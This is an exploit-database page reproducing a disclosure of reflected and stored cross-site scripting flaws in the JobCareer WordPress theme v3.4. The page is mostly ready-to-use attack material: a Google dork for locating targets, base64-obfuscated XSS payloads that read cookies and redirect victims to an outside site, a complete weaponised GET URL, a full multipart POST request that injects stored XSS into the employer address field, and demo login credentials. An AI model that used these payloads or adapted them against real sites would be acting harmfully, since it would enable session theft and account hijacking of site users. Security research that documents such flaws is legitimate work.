Advertisement






JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

CVE Category Price Severity
CVE-2021-24189 CWE-79 $500 High
Author Risk Exploitation Type Date
Rakesh Mane High Remote 2020-07-27
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.93 0.99403

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070129

Below is a copy:

JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/jobcareer/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 3.4
[+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities was discovered in the JobCareer theme through 3.4 for WordPress.

[i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location

[i] Authenticated Persistent XSS on Employer Profile -> Complete Address text field

[i] Demo account: vladvector / vector (login / password)

[i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS

[x] Authenticated Persistent XSS



### [ Payloads: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">



### [ PoC Unauthenticated Reflected XSS: ]

[!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job

[!] GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1
Host: jobcareer.chimpgroup.com



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: jobcareer.chimpgroup.com
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876
Content-Length: 3832
Origin: http://jobcareer.chimpgroup.com
Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile
Cookie: [cookies_here]

-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cover_media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cover_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="display_name"

VladVector
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_allow_search"

yes
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_specialisms[]"

banking
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="comp_detail"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_facebook"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_twitter"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_linkedin"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_phone_number"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_email"

[email protected]
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_url"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_country"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_city"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_comp_address"

"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_address"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_latitude"

51.5073509
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_longitude"

-0.12775829999998223
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_add_new_loc"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_zoom"

11
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[established]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[team-size]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[type]"

private
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_profile"

update_profile
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_user"

12919
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="action"

ajax_employer_form_save
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="post_id"

12919
-----------------------------373898295520776006712397621876--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum